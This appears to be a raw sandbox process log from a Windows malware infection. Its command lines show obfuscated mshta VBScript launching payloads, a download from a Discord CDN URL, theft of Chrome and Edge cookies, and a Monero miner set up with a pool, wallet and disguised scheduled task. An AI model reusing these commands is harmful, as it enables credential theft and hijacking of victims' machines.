C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\C319.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1904 -ip 1904
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 332
C:\Users\Admin\AppData\Local\Temp\is-BQM84.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BQM84.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$20356,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4596 -ip 4596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 276
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 668 -ip 668
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 344 -ip 344
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1476 -ip 1476
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Roaming\6304551.exe
"C:\Users\Admin\AppData\Roaming\6304551.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 296
C:\Users\Admin\AppData\Roaming\2684263.exe
"C:\Users\Admin\AppData\Roaming\2684263.exe"
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\4525299.exe
"C:\Users\Admin\AppData\Roaming\4525299.exe"
C:\Users\Admin\AppData\Roaming\8651870.exe
"C:\Users\Admin\AppData\Roaming\8651870.exe"
C:\Users\Admin\AppData\Local\Temp\18211\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5920 -ip 5920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 280
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-T5IPI.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T5IPI.tmp\Stats.tmp" /SL5="$502EC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-UI320.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UI320.tmp\Inlog.tmp" /SL5="$103DC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-0CGAQ.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0CGAQ.tmp\MediaBurner2.tmp" /SL5="$2046A,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 452
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Users\Admin\AppData\Local\Temp\is-E3GU9.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E3GU9.tmp\VPN.tmp" /SL5="$1049E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\is-UAMQ5.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UAMQ5.tmp\WEATHER Manager.tmp" /SL5="$20448,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-C4RDE.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-C4RDE.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5948 -ip 5948
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 804 -ip 804
C:\Users\Admin\AppData\Local\Temp\is-JE7NO.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-JE7NO.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 292
C:\Users\Admin\AppData\Roaming\3516746.exe
"C:\Users\Admin\AppData\Roaming\3516746.exe"
C:\Users\Admin\AppData\Roaming\3185609.exe
"C:\Users\Admin\AppData\Roaming\3185609.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 5640 -ip 5640
C:\Users\Admin\AppData\Roaming\2461552.exe
"C:\Users\Admin\AppData\Roaming\2461552.exe"
C:\Users\Admin\AppData\Roaming\7704475.exe
"C:\Users\Admin\AppData\Roaming\7704475.exe"
C:\Users\Admin\AppData\Roaming\6116581.exe
"C:\Users\Admin\AppData\Roaming\6116581.exe"
C:\Users\Admin\AppData\Local\Temp\tmp62C2_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp62C2_tmp.exe"
C:\Users\Admin\Documents\6npmyQYmeKqSOA6b_bjV_PdO.exe
"C:\Users\Admin\Documents\6npmyQYmeKqSOA6b_bjV_PdO.exe"
C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe
"C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe"
C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\Documents\ZGIVN8gGl0jIe5D2hXcLwZXM.exe
"C:\Users\Admin\Documents\ZGIVN8gGl0jIe5D2hXcLwZXM.exe"
C:\Users\Admin\Documents\jUpkvHPmJlEoqJuUXffNR6Hj.exe
"C:\Users\Admin\Documents\jUpkvHPmJlEoqJuUXffNR6Hj.exe"
C:\Users\Admin\Documents\NO1ZPpkrNgnYkLSRMU1PGfwM.exe
"C:\Users\Admin\Documents\NO1ZPpkrNgnYkLSRMU1PGfwM.exe"
C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe
"C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe"
C:\Users\Admin\Documents\Cdz7Pc85qTIaJ5hBcDc2rZgC.exe
"C:\Users\Admin\Documents\Cdz7Pc85qTIaJ5hBcDc2rZgC.exe"
C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe
"C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe"
C:\Users\Admin\Documents\Jo7OZ89bXUVMlrcM4raAPrDn.exe
"C:\Users\Admin\Documents\Jo7OZ89bXUVMlrcM4raAPrDn.exe"
C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe
"C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe"
C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe
"C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5640 -s 2440
C:\Users\Admin\Documents\5mwtbXnYpF593KoQDzFTuT57.exe
"C:\Users\Admin\Documents\5mwtbXnYpF593KoQDzFTuT57.exe"
C:\Users\Admin\Documents\EHuVBs2olHPTld3kRQVhmPfR.exe
"C:\Users\Admin\Documents\EHuVBs2olHPTld3kRQVhmPfR.exe"
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\AC1F.exe
C:\Users\Admin\AppData\Local\Temp\AC1F.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\Xln9yzydEwkGNbl5JGPq_WX8.exe
"C:\Users\Admin\Documents\Xln9yzydEwkGNbl5JGPq_WX8.exe"
C:\Users\Admin\Documents\rCeG4ZmHOb6ytuB08XY1OkzL.exe
"C:\Users\Admin\Documents\rCeG4ZmHOb6ytuB08XY1OkzL.exe"
C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe
"C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe"
C:\Users\Admin\Documents\46MxFuv5pPbqbm3tdvh8dNuv.exe
"C:\Users\Admin\Documents\46MxFuv5pPbqbm3tdvh8dNuv.exe"
C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe
"C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe"
C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe
"C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe"
C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe
"C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe"
C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe
"C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe"
C:\Users\Admin\Documents\u0fBxcPcsS7ntBcyE6V4NkFy.exe
"C:\Users\Admin\Documents\u0fBxcPcsS7ntBcyE6V4NkFy.exe"
C:\Users\Admin\Documents\qim0cCHWRJ5eDmE41veRE9DB.exe
"C:\Users\Admin\Documents\qim0cCHWRJ5eDmE41veRE9DB.exe"
C:\Users\Admin\AppData\Local\Temp\is-VE2NA.tmp\Xln9yzydEwkGNbl5JGPq_WX8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VE2NA.tmp\Xln9yzydEwkGNbl5JGPq_WX8.tmp" /SL5="$10646,138429,56832,C:\Users\Admin\Documents\Xln9yzydEwkGNbl5JGPq_WX8.exe"
C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe
"C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6564 -ip 6564
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\BD09.bat C:\Users\Admin\Documents\Cdz7Pc85qTIaJ5hBcDc2rZgC.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1244 -ip 1244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7084 -ip 7084
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7920 -ip 7920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5984 -ip 5984
C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe
"C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe" -q
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "rIZJ4ytlux72tUqT6sEJBGjx.exe" -f
C:\Users\Admin\AppData\Local\Temp\DD33.exe
C:\Users\Admin\AppData\Local\Temp\DD33.exe
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe
C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 6056 -ip 6056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5016 -ip 5016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 7400 -ip 7400
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6024 -ip 6024
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 284
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 7628 -ip 7628
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2BDE09EBF1D97E917DA6B08AC652AB0C C
C:\Users\Admin\AppData\Roaming\8205194.exe
"C:\Users\Admin\AppData\Roaming\8205194.exe"
C:\Users\Admin\AppData\Roaming\5422328.exe
"C:\Users\Admin\AppData\Roaming\5422328.exe"
